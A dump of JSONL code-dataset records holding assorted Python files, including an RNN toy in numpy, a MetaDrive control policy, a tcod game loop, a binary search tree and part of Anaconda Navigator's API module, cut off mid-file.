1:\n\t\t\t\t\tf.write(','.join(data) + \"\\n\")\n\t\t\t\t#print '\\t'.join(data)\n\t\t\t\tprint (get_print_items(items_len, data))\n\t\telse:\n\t\t\tprint (\"%s not found\" % letters)\n\t\t\tif mode > 1:\n\t\t\t\tf.write(\"%s not found\\n\" % letters)\n\t\tif mode > 1:\n\t\t\tf.flush()\n\tf.close()","sub_path":"python/20150304/4g/4g.py","file_name":"4g.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"372806086","text":"import numpy as np\n\ndef tanh(x):\n return np.tanh(x)\n\ndef d_tanh(x):\n return 1 - tanh(x) ** 2\n\nnp.random.seed(1234)\nx = np.array([\n [1,1,1,1],\n [1,1,0,1],\n [0,0,1,1],\n [1,1,0,0],\n [0,0,0,0],\n [1,1,1,0]\n])\n\ny = x.sum(axis=1)\n\nwx = np.random.randn()\nwrec = np.random.randn()\nwx_learning = 0.5\nwrec_learning = 0.002\n\nstates = np.zeros((x.shape[0],x.shape[1]+1))\ngrad_overtime = np.zeros(x.shape)\n\n\nprint(\"Data :\",x.shape)\nprint(\"states :\",states.shape)\nnumber_epoch = 30000\n\nfor iter in range(number_epoch):\n \n state_1 = states[:,0] * wrec + x[:,0] * wx\n state_1 = tanh(state_1)\n states[:,1] = state_1\n\n state_2 = states[:,1] * wrec + x[:,1] * wx\n state_2 = tanh(state_2)\n states[:,2] = state_2\n\n state_3 = states[:,2] * wrec + x[:,2] * wx\n state_3 = tanh(state_3)\n states[:,3] = state_3\n\n state = states[:,3] * wrec + x[:,3] * wx\n # state = tanh(state)\n states[:,4] = state\n\n cost = np.square(states[:,4] - y).sum() / len(x)\n \n if iter % 1000 == 0 :\n print(\"Current Iter: \", iter, \" current error: \",cost)\n\n grad_overtime[:,3] = (states[:,4] - np.squeeze(y)) * (2/len(x))\n grad_overtime[:,2] = grad_overtime[:,3] * wrec \n grad_overtime[:,1] = grad_overtime[:,2] * wrec\n grad_overtime[:,0] = grad_overtime[:,1] * wrec\n\n grad_wx = np.sum(grad_overtime[:,3] * x[:,3] + \n grad_overtime[:,2] * x[:,2] * d_tanh(state_3)+ \n grad_overtime[:,1] * x[:,1] * d_tanh(state_2)+ \n grad_overtime[:,0] * x[:,0] * d_tanh(state_1))\n\n grad_rec = np.sum(grad_overtime[:,3] * states[:,3] + \n grad_overtime[:,2] * states[:,2] * d_tanh(state_3) + \n grad_overtime[:,1] * states[:,1] * d_tanh(state_2) + \n grad_overtime[:,0] * states[:,0] * d_tanh(state_1))\n \n wx = wx - wx_learning * grad_wx\n wrec = wrec - wrec_learning * grad_rec\n\n\n\n\nstate = states[:,0] * wrec + x[:,0] * wx\nstate = tanh(state)\nstates[:,1] = state\n\nstate = states[:,1] * wrec + x[:,1] * wx\nstate = tanh(state)\nstates[:,2] = state\n\nstate = states[:,2] * wrec + x[:,2] * wx\nstate = tanh(state)\nstates[:,3] = state\n\nstate = states[:,3] * wrec + x[:,3] * wx\n# state = tanh(state)\nstates[:,4] = state\n\n\nprint(y)\n\nprint(states[:,4])\nprint(np.round(states[:,4]))\n\n\n# -- end code --","sub_path":"1_numpy/c_After_final_restart_dec_15/h_rnn_with_tanh.py","file_name":"h_rnn_with_tanh.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"415022614","text":"from metadrive.engine.core.manual_controller import KeyboardController, SteeringWheelController\nfrom metadrive.examples import expert\nfrom metadrive.policy.env_input_policy import EnvInputPolicy\nfrom metadrive.engine.engine_utils import get_global_config\n\n\nclass ManualControlPolicy(EnvInputPolicy):\n \"\"\"\n Control the current track vehicle\n \"\"\"\n def __init__(self, obj, seed):\n super(ManualControlPolicy, self).__init__(obj, seed)\n config = self.engine.global_config\n self.engine.accept(\"t\", self.toggle_takeover)\n if config[\"manual_control\"] and config[\"use_render\"]:\n if config[\"controller\"] == \"keyboard\":\n self.controller = KeyboardController()\n elif config[\"controller\"] == \"joystick\":\n try:\n self.controller = SteeringWheelController()\n except:\n print(\"Load Joystick Error! Fall back to keyboard control\")\n self.controller = KeyboardController()\n else:\n raise ValueError(\"No such a controller type: {}\".format(self.config[\"controller\"]))\n\n def act(self, agent_id):\n try:\n if self.engine.current_track_vehicle.expert_takeover:\n return expert(self.engine.current_track_vehicle)\n except ValueError:\n # if observation doesn't match, fall back to manual control\n pass\n if self.engine.global_config[\"manual_control\"] and self.engine.agent_manager.get_agent(\n agent_id) is self.engine.current_track_vehicle and not self.engine.main_camera.is_bird_view_camera():\n return self.controller.process_input(self.engine.current_track_vehicle)\n else:\n return super(ManualControlPolicy, self).act(agent_id)\n\n def toggle_takeover(self):\n if self.engine.current_track_vehicle is not None:\n self.engine.current_track_vehicle.expert_takeover = not self.engine.current_track_vehicle.expert_takeover\n\n\nclass TakeoverPolicy(EnvInputPolicy):\n \"\"\"\n Record the takeover signal\n \"\"\"\n def __init__(self, obj, seed):\n super(TakeoverPolicy, self).__init__(obj, seed)\n config = get_global_config()\n if config[\"manual_control\"] and config[\"use_render\"]:\n if config[\"controller\"] == \"joystick\":\n self.controller = SteeringWheelController()\n else:\n raise ValueError(\"Takeover policy can only be activated with SteeringWheel\")\n self.takeover = False\n\n def act(self, agent_id):\n agent_action = super(TakeoverPolicy, self).act(agent_id)\n if self.engine.global_config[\"manual_control\"] and self.engine.agent_manager.get_agent(\n agent_id) is self.engine.current_track_vehicle and not self.engine.main_camera.is_bird_view_camera():\n expert_action = self.controller.process_input(self.engine.current_track_vehicle)\n if self.controller.left_shift_paddle or self.controller.right_shift_paddle:\n # if expert_action[0]*agent_action[0]< 0 or expert_action[1]*agent_action[1] < 0:\n self.takeover = True\n return expert_action\n self.takeover = False\n return agent_action\n","sub_path":"metadrive/policy/manual_control_policy.py","file_name":"manual_control_policy.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"653427842","text":"import tcod\r\nimport tcod.event as tc_event\r\nfrom input_handlers import handle_keys\r\nfrom entity import Entity\r\nfrom map_objects.game_map import GameMap\r\nfrom render_functions import render_all, clear_all\r\n\r\n\r\ndef main():\r\n screen_width = 80\r\n screen_height = 50\r\n\r\n map_width = 80\r\n map_height = 45\r\n room_max_size = 10\r\n room_min_size = 6\r\n max_rooms = 30\r\n\r\n colors = {\r\n 'dark_wall': tcod.Color(0, 0, 100),\r\n 'dark_ground': tcod.Color(50, 50, 150),\r\n }\r\n\r\n player = Entity(int(screen_width/2), int(screen_height/2), '@', tcod.white)\r\n npc = Entity(int(screen_width / 2 - 5), int(screen_height / 2), '@', tcod.yellow)\r\n entities = [npc, player]\r\n\r\n tcod.console_set_custom_font('arial10x10.png', tcod.FONT_TYPE_GRAYSCALE | tcod.FONT_LAYOUT_TCOD)\r\n\r\n con = tcod.console_init_root(screen_width, screen_height, 'tcod tutorial revised', False, tcod.RENDERER_SDL2)\r\n\r\n game_map = GameMap(map_width, map_height)\r\n game_map.make_map(max_rooms, room_min_size, room_max_size, map_width, map_height, player)\r\n\r\n tcod.console_set_char_background(con, 6, 6, tcod.red, flag=tcod.BKGND_NONE )\r\n while True: # Main loop\r\n\r\n render_all(con, entities, game_map, screen_width, screen_height, colors)\r\n tcod.console_flush()\r\n clear_all(con, entities)\r\n\r\n for event in tc_event.wait():\r\n if event.type == \"QUIT\":\r\n print(event)\r\n raise SystemExit()\r\n elif event.type == \"KEYDOWN\":\r\n action = handle_keys(event)\r\n\r\n move = action.get('move')\r\n exit = action.get('exit')\r\n fullscreen = action.get('fullscreen')\r\n\r\n if move:\r\n dx, dy = move\r\n if not game_map.is_blocked(player.x + dx, player.y + dy):\r\n player.move(dx, dy)\r\n\r\n if exit:\r\n raise SystemExit()\r\n\r\n if fullscreen:\r\n tcod.console_set_fullscreen(not tcod.console_is_fullscreen())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"262529124","text":"\"\"\"\nImplement Binary Search Tree\n\"\"\"\n\nclass Node:\n\n def __init__(self,value):\n self.value = value\n self.right = None\n self.left = None\n\nclass BinarySearchTree:\n\n def __init__(self):\n self.root = None\n\n def insertloop(self,value):\n newNode = Node(value)\n if self.root == None:\n self.root = newNode\n return\n else:\n current = self.root\n while True:\n if value < current.value:\n if current.left == None:\n current.left = newNode\n return\n else:\n current = current.left\n elif value > current.value:\n if current.right == None:\n current.right = newNode\n return\n else:\n current = current.right\n \n\n def insert(self,value):\n if self.root == None:\n self.root = Node(value)\n return\n\n return self.insertNode(value,self.root) # you could also do this with a loop\n # instead of recursivly\n\n def insertNode(self,value,node=None):\n\n if value > node.value:\n if node.right == None:\n node.right = Node(value)\n return\n else:\n self.insertNode(value,node=node.right)\n\n elif value < node.value:\n if node.left == None:\n node.left = Node(value)\n return\n else:\n self.insertNode(value,node=node.left)\n\n\n def find(self,value):\n if self.root == None:\n return None\n\n return self.findNode(value,self.root) # you could also do this with a loop\n # instead of recursivly\n\n def findNode(self,value,node=None):\n if node == None:\n return None\n if node.value == value:\n return node\n\n if value > node.value:\n if node.right != None:\n self.findNode(value,node=node.right)\n\n elif value < node.value:\n if node.left != None:\n self.findNode(value,node=node.left)\n\n #return None\n\nif __name__ == \"__main__\":\n bins = BinarySearchTree()\n NodeRoot = Node(10)\n node1 = Node(5)\n node2 = Node(13)\n node3 = Node(2)\n node4 = Node(7)\n node5 = Node(10)\n node6 = Node(16)\n NodeRoot.left = node1\n NodeRoot.right = node2\n node1.left = node3\n node1.right = node4\n node2.left = node5\n node2.right = node6\n bins.root = NodeRoot\n bins.insertloop(8)\n bins.find(2)\n","sub_path":"Old/ColtSteele/DS/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571210536","text":"import csv\nwith open(\"shuzhe2.csv\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n a = 0\n cartdata = open('cart2.txt', 'r')\n for data in cartdata:\n date = data.strip()\n bac = str(row[0])\n # if '643824322783' in bac and '643824322783' in date:\n # print(date, repr(date), bac, repr(bac))\n if (str.find(date,bac) != -1 or str.find(bac, date) != -1) and date != '' and bac != '':\n a = a+1\n print(date, bac)\n f = open('matrix.txt', 'a')\n f.write('%s, %s' % (date, bac))\n f.write('\\n')\n f.close()\n break\n if a == 0:\n f = open('matrix.txt', 'a')\n f.write('FALSE')\n f.write('\\n')\n f.close()\n else:\n f = open('matrix.txt', 'a')\n f.write('TRUE')\n f.write('\\n')\n a = 0\n f.close()\ncartdata.close()\n","sub_path":"SKU finder/sccnew.py","file_name":"sccnew.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26701902","text":"from config.dbconfig import pg_config\nimport psycopg2\n\nclass RequestersDAO:\n def __init__(self):\n connection_url = \"dbname=%s user=%s password=%s\" % (pg_config['dbname'], pg_config['user'], pg_config['passwd'])\n self.conn = psycopg2._connect(connection_url)\n\n def getAllRequesters(self):\n cursor = self.conn.cursor()\n query = \"select * from requesters;\"\n cursor.execute(query)\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getRequesterById(self, reqID):\n cursor = self.conn.cursor()\n query = \"select * from requesters where reqID = %s;\"\n cursor.execute(query, (reqID,))\n result = cursor.fetchone()\n return result","sub_path":"dao/requesters.py","file_name":"requesters.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331513489","text":"import numpy as np\r\nimport pandas as pd \r\nfrom sklearn.svm import SVC\r\nimport sys\r\nimport os\r\n\r\nt = {'bind': 1, 'not_bind': 0}\r\n\r\ndef load_data(l):\r\n\tres = []\r\n\tlabels = []\r\n\tfor i in l:\r\n\t\tlabel = t[i.split('/')[-2]]\r\n\t\tc = pd.read_csv(i, sep='\\t', header = None).values.flatten()\r\n\t\tres.append(c)\r\n\t\tlabels.append(label)\r\n\treturn res, labels\r\n\r\ndef train(x, y):\r\n\tsvc = SVC()\r\n\tsvc.fit(x, y)\r\n\treturn svc \r\n\r\ndef test(svc, x, y):\r\n\treturn svc.score(x, y)\r\n\r\ndef main(train_path, test_path):\r\n\tprint('loading dataset')\r\n\ttrain_x, train_y = load_data([os.path.join(train_path, 'bind', x) for x in os.listdir(os.path.join(train_path, 'bind'))] + [os.path.join(train_path, 'not_bind', x) for x in os.listdir(os.path.join(train_path, 'not_bind'))])\r\n\ttest_x, test_y = train_x, train_y#load_data([os.path.join(test_path, 'bind', x) for x in os.listdir(os.path.join(test_path, 'bind'))] + [os.path.join(test_path, 'not_bind', x) for x in os.listdir(os.path.join(test_path, 'not_bind'))])\r\n\tprint('training')\r\n\tc = train(train_x, train_y)\r\n\tprint('testing')\r\n\ttrain_acc, test_acc = test(c, train_x, train_y), test(c, test_x, test_y)\r\n\tprint('train_acc: %f, test_acc: %f' % (train_acc, test_acc))\r\n\r\nif __name__ == '__main__':\r\n\tmain(sys.argv[1], sys.argv[2])","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"19032733","text":"print(\"acontinuacion se le pedira el peso de cada uno de sus bultos, si no tiene mas, por favor poner 0\")\nc=int(input(\"bultos que va a ingresar: \"))#esto lo hago por que ya lo probe con 15 y me parecia buena idea que usted lo intentara con varios bultos\ncont1=0\ncont2=0\nbultos=0\npesoTotal=0\nvalorTotal=0\nfor i in range(0,c):\n a=float(input(\"ingresar peso\"))\n if i==0 and a<500:\n cont1=a\n cont2=a\n if a < cont2 and a!=0 :\n cont2 = a\n if a>cont1 and a<501:\n cont1=a\n if a!=0 and a>0 and a<=25:\n bultos+=1\n pesoTotal=pesoTotal+a\n if a!=0 and a>25 and a<=300:\n bultos+=1\n pesoTotal=pesoTotal+a\n valorTotal=valorTotal+(a*1500)\n if a!=0 and a>300 and a<=500:\n bultos+=1\n pesoTotal=pesoTotal+a\n valorTotal=valorTotal+(a*2500)\n if a>500 :\n print(\"Este bulto no sera puesto en el avion por exceso de peso\")\n if a==0 :\n break\nif pesoTotal>1800:\n print(\"no podemos subir esto al avion por que su peso es: \",pesoTotal,\"El peso debese menor o igual a 1800\")\nelse:\n if pesoTotal <=1800:\n print(\"el numero total de bultos es:\", bultos)\n print(\"El peso del bulto mas pesado es\", cont1, \"\\nEl bulto menos pesado es: \", cont2)\n print(\"El peso promedio de peso cada bulto es\", (pesoTotal / bultos))\n print(\"El precio de el total de bultos en pesos colobiamnos es: \", valorTotal)\n print(\"el valor por peso en dolares sera: \", (valorTotal * 3165)) # El dvalor del dolar el dia sabado\n print(\"el valor por peso de los bultos en colombianos 5es: \",pesoTotal)\n\n\n\n","sub_path":"punto 78.py","file_name":"punto 78.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"328008359","text":"# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright 2016 Continuum Analytics, Inc.\n#\n# May be copied and distributed freely only as part of an Anaconda or\n# Miniconda installation.\n# -----------------------------------------------------------------------------\n\"\"\"API for using the api (anaconda-client, downloads and conda).\"\"\"\n\n# yapf: disable\n\n# Standard library imports\nfrom collections import OrderedDict\nimport copy\nimport datetime\nimport json\nimport os\n\n# Third party imports\nfrom qtpy.QtCore import QObject, Signal\nimport _license\n\n# Local imports\nfrom anaconda_navigator.api.client_api import ClientAPI\nfrom anaconda_navigator.api.conda_api import CondaAPI\nfrom anaconda_navigator.api.download_api import DownloadAPI\nfrom anaconda_navigator.config import (CONF, LICENSE_NAME_FOR_PACKAGE,\n LICENSE_PATH, PACKAGES_WITH_LICENSE,\n REMOVED_LICENSE_PATH,\n VALID_PRODUCT_LICENSES)\nfrom anaconda_navigator.static import images\n\n\n# yapf: enable\n\n\nclass _AnacondaAPI(QObject):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n\n sig_repodata_updated = Signal(object)\n sig_repodata_errored = Signal()\n\n def __init__(self):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n super(_AnacondaAPI, self).__init__()\n\n # API's\n self.config = CONF\n self._conda_api = CondaAPI()\n self._client_api = ClientAPI()\n self._download_api = DownloadAPI()\n self.ROOT_PREFIX = self._conda_api.ROOT_PREFIX\n\n # Vars\n self._checking_repos = None\n self._data_directory = None\n self._files_downloaded = None\n self._repodata_files = None\n self._valid_repos = None\n\n # Expose some methods for convenient access. Methods return a worker\n self.conda_create = self._conda_api.create\n self.conda_create_yaml = self._conda_api.create_from_yaml\n self.conda_clone = self._conda_api.clone_environment\n self.conda_dependencies = self._conda_api.dependencies\n self.conda_get_condarc_channels = self._conda_api.get_condarc_channels\n self.conda_install = self._conda_api.install\n self.conda_remove = self._conda_api.remove\n self.conda_terminate = self._conda_api.terminate_all_processes\n self.conda_config_add = self._conda_api.config_add\n self.conda_config_set = self._conda_api.config_set\n self.conda_config_remove = self._conda_api.config_remove\n self.pip_list = self._conda_api.pip_list\n self.pip_remove = self._conda_api.pip_remove\n\n # No workers are returned for these methods\n self.conda_clear_lock = self._conda_api.clear_lock\n self.conda_environment_exists = self._conda_api.environment_exists\n self.conda_get_envs = self._conda_api.get_envs\n self.conda_linked = self._conda_api.linked\n self.conda_linked_apps_info = self._conda_api.linked_apps_info\n self.conda_get_prefix_envname = self._conda_api.get_prefix_envname\n self.conda_package_version = self._conda_api.package_version\n self.conda_platform = self._conda_api.get_platform\n self.conda_load_proxy_config = self._conda_api.load_proxy_config\n\n self.conda_split_canonical_name = self._conda_api.split_canonical_name\n\n # These download methods return a worker\n _get_api_info = self._download_api.get_api_info\n _is_valid_url = self._download_api.is_valid_api_url\n _get_api_url = self._client_api.get_api_url\n self.download = self._download_api.download\n self.download_is_valid_url = self._download_api.is_valid_url\n self.download_is_valid_api_url = _is_valid_url\n self.download_get_api_info = lambda: _get_api_info(_get_api_url())\n self.download_is_valid_channel = self._download_api.is_valid_channel\n self.download_terminate = self._download_api.terminate\n\n # These client methods return a worker\n self.client_store_token = self._client_api.store_token\n self.client_remove_token = self._client_api.remove_token\n self.client_login = self._client_api.login\n self.client_logout = self._client_api.logout\n self.client_load_repodata = self._client_api.load_repodata\n self.client_prepare_packages_data = self._client_api.prepare_model_data\n self.client_user = self._client_api.user\n self.client_domain = self._client_api.domain\n self.client_set_domain = self._client_api.set_domain\n self.client_packages = self._client_api.packages\n self.client_multi_packages = self._client_api.multi_packages\n self.client_organizations = self._client_api.organizations\n self.client_load_token = self._client_api.load_token\n self.client_get_api_url = self._client_api.get_api_url\n self.client_set_api_url = self._client_api.set_api_url\n self.client_get_ssl = self._client_api.get_ssl\n self.client_set_ssl = self._client_api.set_ssl\n self.client_get_user_licenses = self._client_api.get_user_licenses\n\n # No workers are returned for these methods\n m = self._client_api.get_logged_user_list_channels\n self.client_get_logged_user_list_channels = m\n\n # --- Helper methods\n # -------------------------------------------------------------------------\n def _set_repo_urls_from_channels(self, channels):\n \"\"\"\n Convert a channel into a normalized repo name including.\n\n Channels are assumed in normalized url form.\n \"\"\"\n repos = []\n sys_platform = self._conda_api.get_platform()\n\n # Platform specific channels\n for channel in channels:\n url = '{0}/{1}/repodata.json.bz2'.format(channel, sys_platform)\n repos.append(url)\n\n # Noarch channels\n for channel in channels:\n url = '{0}/noarch/repodata.json.bz2'.format(channel)\n repos.append(url)\n\n return repos\n\n def _check_repos(self, repos):\n \"\"\"Check if repodata urls are valid.\"\"\"\n self._checking_repos = []\n self._valid_repos = []\n\n for repo in repos:\n worker = self.download_is_valid_url(repo)\n worker.sig_finished.connect(self._repos_checked)\n worker.repo = repo\n self._checking_repos.append(repo)\n\n def _repos_checked(self, worker, output, error):\n \"\"\"Callback for _check_repos.\"\"\"\n if worker.repo in self._checking_repos:\n self._checking_repos.remove(worker.repo)\n\n if output:\n self._valid_repos.append(worker.repo)\n\n if len(self._checking_repos) == 0:\n self._download_repodata(self._valid_repos)\n\n def _repo_url_to_path(self, repo):\n \"\"\"Convert a `repo` url to a file path for local storage.\"\"\"\n repo = repo.replace('http://', '')\n repo = repo.replace('https://', '')\n repo = repo.replace('/', '_')\n\n return os.sep.join([self._data_directory, repo])\n\n def _download_repodata(self, checked_repos):\n \"\"\"Dowload repodata.\"\"\"\n self._files_downloaded = []\n self._repodata_files = []\n self.__counter = -1\n\n if checked_repos:\n for repo in checked_repos:\n path = self._repo_url_to_path(repo)\n self._files_downloaded.append(path)\n self._repodata_files.append(path)\n worker = self.download(\n repo,\n path,\n verify=self._client_api.get_ssl(),\n )\n worker.url = repo\n worker.path = path\n worker.sig_finished.connect(self._repodata_downloaded)\n else:\n # Empty, maybe there is no internet connection\n # Load information from conda-meta and save that file\n path = self._get_repodata_from_meta()\n self._repodata_files = [path]\n self._repodata_downloaded()\n\n def _get_repodata_from_meta(self):\n \"\"\"Generate repodata from local meta files.\"\"\"\n path = os.sep.join([self.ROOT_PREFIX, 'conda-meta'])\n packages = os.listdir(path)\n meta_repodata = {}\n for pkg in packages:\n if pkg.endswith('.json'):\n filepath = os.sep.join([path, pkg])\n with open(filepath, 'r') as f:\n data = json.load(f)\n\n if 'files' in data:\n data.pop('files')\n if 'icondata' in data:\n data.pop('icondata')\n\n name = pkg.replace('.json', '')\n meta_repodata[name] = data\n\n meta_repodata_path = os.sep.join(\n [\n self._data_directory,\n 'offline.json',\n ]\n )\n repodata = {'info': [], 'packages': meta_repodata}\n\n with open(meta_repodata_path, 'w') as f:\n json.dump(\n repodata,\n f,\n sort_keys=True,\n indent=4,\n separators=(',', ': '),\n )\n\n return meta_repodata_path\n\n def _repodata_downloaded(self, worker=None, output=None, error=None):\n \"\"\"Callback for _download_repodata.\"\"\"\n if worker:\n self._files_downloaded.remove(worker.path)\n\n if worker.path in self._files_downloaded:\n self._files_downloaded.remove(worker.path)\n\n if len(self._files_downloaded) == 0:\n self.sig_repodata_updated.emit(list(set(self._repodata_files)))\n\n # --- Public API\n # -------------------------------------------------------------------------\n def set_data_directory(self, data_directory):\n \"\"\"Set the directory where repodata and metadata are stored.\"\"\"\n self._data_directory = data_directory\n\n def repodata_files(self, channels=None):\n \"\"\"\n Return the repodata paths based on `channels` and the `data_directory`.\n\n There is no check for validity here.\n \"\"\"\n if channels is None:\n channels = self.conda_get_condarc_channels()\n\n repodata_urls = self._set_repo_urls_from_channels(channels)\n\n repopaths = []\n\n for repourl in repodata_urls:\n fullpath = os.sep.join([self._repo_url_to_path(repourl)])\n repopaths.append(fullpath)\n\n return repopaths\n\n def update_repodata(self, channels=None):\n \"\"\"Update repodata from channels or use condarc channels if None.\"\"\"\n norm_channels = self.conda_get_condarc_channels(\n channels=channels,\n normalize=True,\n )\n repodata_urls = self._set_repo_urls_from_channels(norm_channels)\n self._check_repos(repodata_urls)\n\n def update_metadata(self):\n \"\"\"\n Update the metadata available for packages in repo.continuum.io.\n\n Returns a download worker.\n \"\"\"\n # TODO: there needs to be an uniform way to query the metadata for\n # both repo and anaconda.org\n if self._data_directory is None:\n raise Exception('Need to call `api.set_data_directory` first.')\n\n metadata_url = 'https://repo.continuum.io/pkgs/metadata.json'\n filepath = os.sep.join([self._data_directory, 'metadata.json'])\n worker = self.download(metadata_url, filepath)\n return worker\n\n def check_valid_channel(\n self, channel, conda_url='https://conda.anaconda.org'\n ):\n \"\"\"Check if channel is valid.\"\"\"\n if channel.startswith('https://') or channel.startswith('http://'):\n url = channel\n else:\n url = \"{0}/{1}\".format(conda_url, channel)\n\n if url[-1] == '/':\n url = url[:-1]\n plat = self.conda_platform()\n repodata_url = \"{0}/{1}/{2}\".format(url, plat, 'repodata.json')\n worker = self.download_is_valid_url(repodata_url)\n worker.url = url\n return worker\n\n def process_apps(self, apps, prefix=None):\n \"\"\"Process app information.\"\"\"\n # TODO: This also needs to check installed apps in the prefix\n applications = {}\n if prefix is None:\n prefix = self.ROOT_PREFIX\n\n # Temporal hardcoded images\n image_paths = {\n 'glueviz': images.GLUEVIZ_ICON_1024_PATH,\n 'spyder-app': images.SPYDER_ICON_1024_PATH,\n 'spyder': images.SPYDER_ICON_1024_PATH,\n 'ipython-qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'ipython-notebook': images.IPYTHON_NOTEBOOK_ICON_1024_PATH,\n 'notebook': images.NOTEBOOK_ICON_1024_PATH,\n 'orange-app': images.ORANGE_ICON_1024_PATH,\n 'rodeo': images.RODEO_ICON_1024_PATH,\n 'veusz': images.VEUSZ_ICON_1024_PATH,\n 'rstudio': images.RSTUDIO_ICON_PATH,\n }\n\n APPS_DESCRIPTIONS = {\n 'glueviz': (\n 'Multidimensional data visualization across files. '\n 'Explore relationships within and among related '\n 'datasets.'\n ),\n 'notebook': (\n 'Web-based, interactive computing notebook '\n 'environment. Edit and run human-readable docs while '\n 'describing the data analysis.'\n ),\n 'orange-app': (\n 'Component based data mining framework. Data '\n 'visualization and data analysis for novice and '\n 'expert. Interactive workflows with a large '\n 'toolbox.'\n ),\n 'qtconsole': (\n 'PyQt GUI that supports inline figures, proper '\n 'multiline editing with syntax highlighting, '\n 'graphical calltips, and more.'\n ),\n 'spyder': (\n 'Scientific PYthon Development EnviRonment. Powerful '\n 'Python IDE with advanced editing, interactive '\n 'testing, debugging and introspection features'\n ),\n 'rodeo': (\n 'A browser-based IDE for data science with python. '\n 'Includes autocomplete, syntax highlighting, IPython '\n 'support.'\n ),\n 'veusz': (\n 'Veusz is a GUI scientific plotting and graphing '\n 'package. It is designed to produce publication-ready '\n 'Postscript or PDF output.'\n ),\n 'rstudio': (\n 'A set of integrated tools designed to help you be '\n 'more productive with R. Includes R essentials and notebooks.'\n ),\n 'anaconda-fusion': (\n 'Integration between Excel ® and Anaconda '\n 'via Notebooks. Run data science functions, '\n 'interact with results and create advanced '\n 'visualizations in a code-free app inside '\n 'Excel'\n ),\n 'anaconda-mosaic': (\n 'Interactive exploration of larger than '\n 'memory datasets. Create data sources, '\n 'perform transformations and combinations.'\n ),\n }\n\n invalid_apps = [\n 'spyder-app',\n 'ipython-qtconsole',\n 'ipython-notebook',\n 'anacondafusion',\n ]\n\n for app_name in apps:\n if app_name in invalid_apps:\n continue\n\n data = apps[app_name]\n versions = data.get('versions')\n description = APPS_DESCRIPTIONS.get(\n app_name, data.get('description', '')\n )\n version = versions[-1] # Versions are sorted from small to big\n image_path = image_paths.get(\n app_name, images.ANACONDA_ICON_512_PATH\n )\n app_entry = data.get('app_entry').get(version, '')\n\n # Handle deprecated entrypoints for notebook and qtconsole\n if 'ipython notebook' in app_entry.lower():\n app_entry = app_entry.replace(\n 'ipython notebook', 'jupyter-notebook'\n )\n elif 'ipython qtconsole' in app_entry.lower():\n app_entry = app_entry.replace(\n 'ipython qtconsole', 'jupyter-qtconsole'\n )\n\n needs_license = app_name.lower() in PACKAGES_WITH_LICENSE\n application = dict(\n name=app_name,\n description=description,\n versions=versions,\n command=app_entry,\n image_path=image_path,\n needs_license=needs_license,\n )\n applications[app_name] = application\n\n return applications\n\n # --- New moved API\n # -------------------------------------------------------------------------\n @property\n def channels(self):\n \"\"\"Convenience property for returning conda rc channels.\"\"\"\n return list(self.conda_get_condarc_channels())\n\n @property\n def active_channels(self):\n \"\"\"Convenience property for returning active channels.\"\"\"\n active_channels = self.config.get('main', 'conda_active_channels')\n if active_channels is None or not active_channels:\n active_channels = self.channels\n return active_channels\n\n @property\n def active_normalized_channels(self):\n \"\"\"Convenience property for returning active normalized channels.\"\"\"\n return self.conda_get_condarc_channels(\n channels=self.active_channels,\n normalize=True,\n )\n\n @property\n def user_dynamic_channels(self):\n \"\"\"\n Return normalized list of logged user channels.\n\n These are the channels that are located at anaconda server (cloud),\n as opposed to the repo.continuum ones.\n\n FIXME: This method is flawed as defaults could also include logged\n channels.\n \"\"\"\n channels = []\n condarc_channels = self._conda_api.get_condarc_channels()\n\n for ch in condarc_channels:\n if ('repo.continuum' not in ch and ch != 'defaults' and\n '/t/' not in ch):\n channels.append(ch)\n\n channels = [ch for ch in channels if ch in self.active_channels]\n return channels\n\n @property\n def environments(self):\n \"\"\"\n Return an ordered dictionary of all existing named environments.\n\n The dictionary includes the root environment as the first entry.\n \"\"\"\n environments = OrderedDict()\n environments_prefix = sorted(self.conda_get_envs(log=False))\n environments['root'] = self.ROOT_PREFIX\n\n for prefix in environments_prefix:\n name = os.path.basename(prefix)\n environments[name] = prefix\n\n return environments\n\n # --- License management\n # -------------------------------------------------------------------------\n def add_license(self, paths):\n \"\"\"Add license file callback.\"\"\"\n valid_licenses = {}\n invalid_licenses = {}\n paths = [p for p in paths if os.path.isfile(p)]\n for path in paths:\n lic = _license.read_licenses(path)\n if lic:\n valid_licenses[path] = lic\n else:\n invalid_licenses[path] = None\n\n # FIXME: Check if license name exists in any of the paths\n # And then ask the user a question based on this\n if not os.path.isdir(self.license_location()):\n os.mkdir(self.license_location())\n\n for path in valid_licenses:\n head, tail = os.path.split(path)\n new_path = os.path.join(self.license_location(), tail)\n with open(new_path, 'w') as f:\n json.dump(valid_licenses[path], f)\n\n return valid_licenses, invalid_licenses\n\n @staticmethod\n def remove_license(lic):\n 